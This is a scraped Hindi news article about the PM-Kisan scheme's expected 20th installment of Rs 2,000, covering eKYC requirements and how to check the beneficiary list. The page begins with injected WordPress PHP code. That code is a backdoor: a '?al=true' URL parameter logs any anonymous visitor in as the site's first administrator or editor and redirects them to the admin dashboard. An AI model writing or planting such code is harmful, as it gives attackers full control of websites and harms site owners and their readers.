// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); देश के किसानों के लिए एक बार फिर राहत भरी खबर, 20वीं किस्त का इंतज़ार खत्म, जल्द खाते में आएंगे 2,000 रुपये – प्रत्युषा आशा की नयी किरण
देश

देश के किसानों के लिए एक बार फिर राहत भरी खबर, 20वीं किस्त का इंतज़ार खत्म, जल्द खाते में आएंगे 2,000 रुपये

नई दिल्ली 
देश के करोड़ों किसानों के लिए एक बार फिर राहत भरी खबर सामने आई है। प्रधानमंत्री किसान सम्मान निधि (PM-Kisan) योजना के तहत किसानों को हर साल ₹6,000 की आर्थिक सहायता दी जाती है, जो तीन किस्तों में उनके बैंक खातों में ट्रांसफर की जाती है। अब किसान बेसब्री से 20वीं किस्त का इंतज़ार कर रहे हैं। इस बार की किस्त को लेकर एक बड़ा अपडेट सामने आया है – जल्द ही यह राशि किसानों के खातों में पहुंच सकती है। किस्त की तारीख, जरूरी शर्तें और eKYC से जुड़ी अहम जानकारियां जानने के लिए पढ़ें पूरी खबर।

क्या है पीएम-किसान योजना?
प्रधानमंत्री किसान सम्मान निधि योजना का उद्देश्य देश के छोटे और सीमांत किसानों को वित्तीय सुरक्षा प्रदान करना है। इसके तहत पात्र किसानों को हर चार महीने में ₹2,000 की राशि भेजी जाती है, जिससे उन्हें कृषि कार्यों में सहायता मिल सके।

19वीं किस्त में मिले थे ₹22,000 करोड़
बीते 24 फरवरी 2025 को प्रधानमंत्री नरेंद्र मोदी ने बिहार के भागलपुर में आयोजित कार्यक्रम के दौरान योजना की 19वीं किस्त जारी की थी। इसमें 9.8 करोड़ से अधिक किसानों को कुल ₹22,000 करोड़ की राशि ट्रांसफर की गई थी।

अब किस्त नंबर 20 का इंतजार
चूंकि किस्तें हर चार महीने के अंतराल पर दी जाती हैं, इसलिए 20वीं किस्त जून 2025 में जारी होने की पूरी संभावना है। सरकारी सूत्रों के मुताबिक, यह किस्त जून के पहले या दूसरे सप्ताह में किसानों के खातों में आ सकती है। हालांकि, सरकार की ओर से फिलहाल इसकी आधिकारिक तारीख घोषित नहीं की गई है।

e-KYC है अनिवार्य – अभी कर लें पूरा
अगर आप चाहते हैं कि अगली किस्त आपके खाते में समय पर आए, तो eKYC पूरा करना बेहद ज़रूरी है। किसान दो तरीकों से यह प्रक्रिया पूरी कर सकते हैं:

OTP आधारित eKYC: pmkisan.gov.in पर जाकर मोबाइल OTP के ज़रिए।
बायोमेट्रिक eKYC: नजदीकी जन सेवा केंद्र (CSC) पर जाकर।

अपना नाम लाभार्थी सूची में ऐसे देखें
pmkisan.gov.in वेबसाइट पर जाएं।
“लाभार्थी सूची” (Beneficiary List) टैब पर क्लिक करें।
अपने राज्य, जिला, उप-जिला, ब्लॉक और गांव का चयन करें।
“Get Report” पर क्लिक कर देखें कि आपका नाम सूची में है या नहीं।

 

 

Tags

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड